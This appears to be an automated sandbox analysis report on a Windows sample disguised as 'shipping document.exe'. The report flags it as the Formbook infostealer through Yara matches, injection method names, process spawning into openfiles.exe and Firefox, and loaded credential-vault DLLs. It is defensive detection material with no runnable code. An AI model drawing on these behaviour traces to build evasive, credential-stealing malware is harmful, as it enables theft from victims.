Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0182FCF2	2_2_0182FCF2
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0182FFB1	2_2_0182FFB1
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0182FF09	2_2_0182FF09
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01733FD2	2_2_01733FD2
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01733FD5	2_2_01733FD5
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01771F92	2_2_01771F92
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_01779EB0	2_2_01779EB0
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	Code function: 6_2_03B0E026	6_2_03B0E026
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	Code function: 6_2_03B048FA	6_2_03B048FA
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	Code function: 6_2_03B0E079	6_2_03B0E079
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	Code function: 6_2_03B2D789	6_2_03B2D789
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	Code function: 6_2_03B0FFF9	6_2_03B0FFF9
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	Code function: 6_2_03B16733	6_2_03B16733
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	Code function: 6_2_03B16779	6_2_03B16779
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	Code function: 6_2_03B0FDD0	6_2_03B0FDD0
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	Code function: 6_2_03B0FDD9	6_2_03B0FDD9
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0495E4F6	7_2_0495E4F6
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_04954420	7_2_04954420
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_04962446	7_2_04962446
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_04970591	7_2_04970591
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048B0535	7_2_048B0535
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048CC6E0	7_2_048CC6E0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048AC7C0	7_2_048AC7C0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048D4750	7_2_048D4750
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048B0770	7_2_048B0770
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_04942000	7_2_04942000
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_049641A2	7_2_049641A2
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_049701AA	7_2_049701AA
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_049681CC	7_2_049681CC
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048A0100	7_2_048A0100
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0494A118	7_2_0494A118
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_04938158	7_2_04938158
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_049302C0	7_2_049302C0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_04950274	7_2_04950274
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_049703E6	7_2_049703E6
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048BE3F0	7_2_048BE3F0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0496A352	7_2_0496A352
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_04950CB5	7_2_04950CB5
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048A0CF2	7_2_048A0CF2
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048B0C00	7_2_048B0C00
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048C8DBF	7_2_048C8DBF
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048AADE0	7_2_048AADE0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048BAD00	7_2_048BAD00
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0494CD1F	7_2_0494CD1F
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0496CE93	7_2_0496CE93
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048C2E90	7_2_048C2E90
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0496EEDB	7_2_0496EEDB
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0496EE26	7_2_0496EE26
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048B0E59	7_2_048B0E59
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0492EFA0	7_2_0492EFA0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048A2FC8	7_2_048A2FC8
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_04952F30	7_2_04952F30
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048F2F28	7_2_048F2F28
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048D0F30	7_2_048D0F30
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_04924F40	7_2_04924F40
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048968B8	7_2_048968B8
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048DE8F0	7_2_048DE8F0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048BA840	7_2_048BA840
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048B2840	7_2_048B2840
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048B29A0	7_2_048B29A0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0497A9A6	7_2_0497A9A6
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048C6962	7_2_048C6962
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048AEA80	7_2_048AEA80
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_04966BD7	7_2_04966BD7
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0496AB40	7_2_0496AB40
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0496F43F	7_2_0496F43F
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048A1460	7_2_048A1460
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0494D5B0	7_2_0494D5B0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_049795C3	7_2_049795C3
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_04967571	7_2_04967571
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_049616CC	7_2_049616CC
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048F5630	7_2_048F5630
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0496F7B0	7_2_0496F7B0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048B70C0	7_2_048B70C0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0495F0CC	7_2_0495F0CC
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0496F0E0	7_2_0496F0E0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_049670E9	7_2_049670E9
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048BB1B0	7_2_048BB1B0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048E516C	7_2_048E516C
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0489F172	7_2_0489F172
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0497B16B	7_2_0497B16B
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048B52A0	7_2_048B52A0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048CB2C0	7_2_048CB2C0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_049512ED	7_2_049512ED
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048CD2F0	7_2_048CD2F0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048F739A	7_2_048F739A
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0496132D	7_2_0496132D
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0489D34C	7_2_0489D34C
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0496FCF2	7_2_0496FCF2
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_04929C32	7_2_04929C32
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048CFDC0	7_2_048CFDC0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048B3D40	7_2_048B3D40
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_04961D5A	7_2_04961D5A
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_04967D73	7_2_04967D73
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048B9EB0	7_2_048B9EB0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048B1F92	7_2_048B1F92
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0496FFB1	7_2_0496FFB1
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_04873FD5	7_2_04873FD5
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_04873FD2	7_2_04873FD2
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0496FF09	7_2_0496FF09
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048B38E0	7_2_048B38E0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0491D800	7_2_0491D800
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_04945910	7_2_04945910
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048B9950	7_2_048B9950
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048CB950	7_2_048CB950
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048F5AA0	7_2_048F5AA0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_04951AA3	7_2_04951AA3
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0494DAAC	7_2_0494DAAC
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0495DAC6	7_2_0495DAC6
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_04967A46	7_2_04967A46
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0496FA49	7_2_0496FA49
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_04923A6C	7_2_04923A6C
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048CFB80	7_2_048CFB80
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_04925BF0	7_2_04925BF0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048EDBF9	7_2_048EDBF9
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0496FB76	7_2_0496FB76
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_027A1440	7_2_027A1440
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0279C600	7_2_0279C600
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0279C5F7	7_2_0279C5F7
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0279C820	7_2_0279C820
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0279A8A0	7_2_0279A8A0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_027A2F5A	7_2_027A2F5A
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_027A2FA0	7_2_027A2FA0
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_02791121	7_2_02791121
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_027B9FB0	7_2_027B9FB0

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\shipping document.exe	Code function: String function: 0175B970 appears 262 times
Source: C:\Users\user\Desktop\shipping document.exe	Code function: String function: 017B7E54 appears 107 times
Source: C:\Users\user\Desktop\shipping document.exe	Code function: String function: 017DEA12 appears 86 times
Source: C:\Users\user\Desktop\shipping document.exe	Code function: String function: 017EF290 appears 103 times
Source: C:\Users\user\Desktop\shipping document.exe	Code function: String function: 017A5130 appears 58 times
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: String function: 0489B970 appears 262 times
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: String function: 048F7E54 appears 107 times
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: String function: 0492F290 appears 103 times
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: String function: 0491EA12 appears 86 times
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: String function: 048E5130 appears 58 times

Sample file is different than original file name gathered from version info

Source: shipping document.exe, 00000000.00000000.1653959453.0000000001004000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameTrlj.exe: vs shipping document.exe
Source: shipping document.exe, 00000000.00000002.1683528991.000000000A640000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs shipping document.exe
Source: shipping document.exe, 00000000.00000002.1675172411.00000000014DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs shipping document.exe
Source: shipping document.exe, 00000002.00000002.2033082089.00000000011D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameopnfiles.exej% vs shipping document.exe
Source: shipping document.exe, 00000002.00000002.2033082089.00000000011FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameopnfiles.exej% vs shipping document.exe
Source: shipping document.exe, 00000002.00000002.2033450578.000000000185D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs shipping document.exe
Source: shipping document.exe	Binary or memory string: OriginalFilenameTrlj.exe: vs shipping document.exe

Uses 32bit PE files

Source: shipping document.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 2.2.shipping document.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.shipping document.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.4110883708.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.4113195669.0000000005770000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2034898129.0000000002530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.4110925188.0000000004700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2034731642.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: shipping document.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.shipping document.exe.43a9970.2.raw.unpack, V4uC3Iifq56IKQcfry.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.shipping document.exe.43a9970.2.raw.unpack, V4uC3Iifq56IKQcfry.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.shipping document.exe.5ad0000.5.raw.unpack, V4uC3Iifq56IKQcfry.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.shipping document.exe.5ad0000.5.raw.unpack, V4uC3Iifq56IKQcfry.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.shipping document.exe.a640000.7.raw.unpack, GyxdDdUhXZvol2uJqL.cs	Security API names: _0020.SetAccessControl
Source: 0.2.shipping document.exe.a640000.7.raw.unpack, GyxdDdUhXZvol2uJqL.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.shipping document.exe.a640000.7.raw.unpack, GyxdDdUhXZvol2uJqL.cs	Security API names: _0020.AddAccessRule
Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, YDmVa3b2SMMfc8PDHv.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, GyxdDdUhXZvol2uJqL.cs	Security API names: _0020.SetAccessControl
Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, GyxdDdUhXZvol2uJqL.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, GyxdDdUhXZvol2uJqL.cs	Security API names: _0020.AddAccessRule
Source: 0.2.shipping document.exe.a640000.7.raw.unpack, YDmVa3b2SMMfc8PDHv.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: 0.2.shipping document.exe.357f9d0.1.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.shipping document.exe.5c30000.6.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.shipping document.exe.359004c.0.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@16/11

Source: C:\Users\user\Desktop\shipping document.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\shipping document.exe.log

Source: unknown	Process created: C:\Users\user\Desktop\shipping document.exe "C:\Users\user\Desktop\shipping document.exe"
Source: C:\Users\user\Desktop\shipping document.exe	Process created: C:\Users\user\Desktop\shipping document.exe "C:\Users\user\Desktop\shipping document.exe"
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	Process created: C:\Windows\SysWOW64\openfiles.exe "C:\Windows\SysWOW64\openfiles.exe"
Source: C:\Windows\SysWOW64\openfiles.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\shipping document.exe	Process created: C:\Users\user\Desktop\shipping document.exe "C:\Users\user\Desktop\shipping document.exe"	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	Process created: C:\Windows\SysWOW64\openfiles.exe "C:\Windows\SysWOW64\openfiles.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\shipping document.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	Section loaded: wininet.dll	Jump to behavior
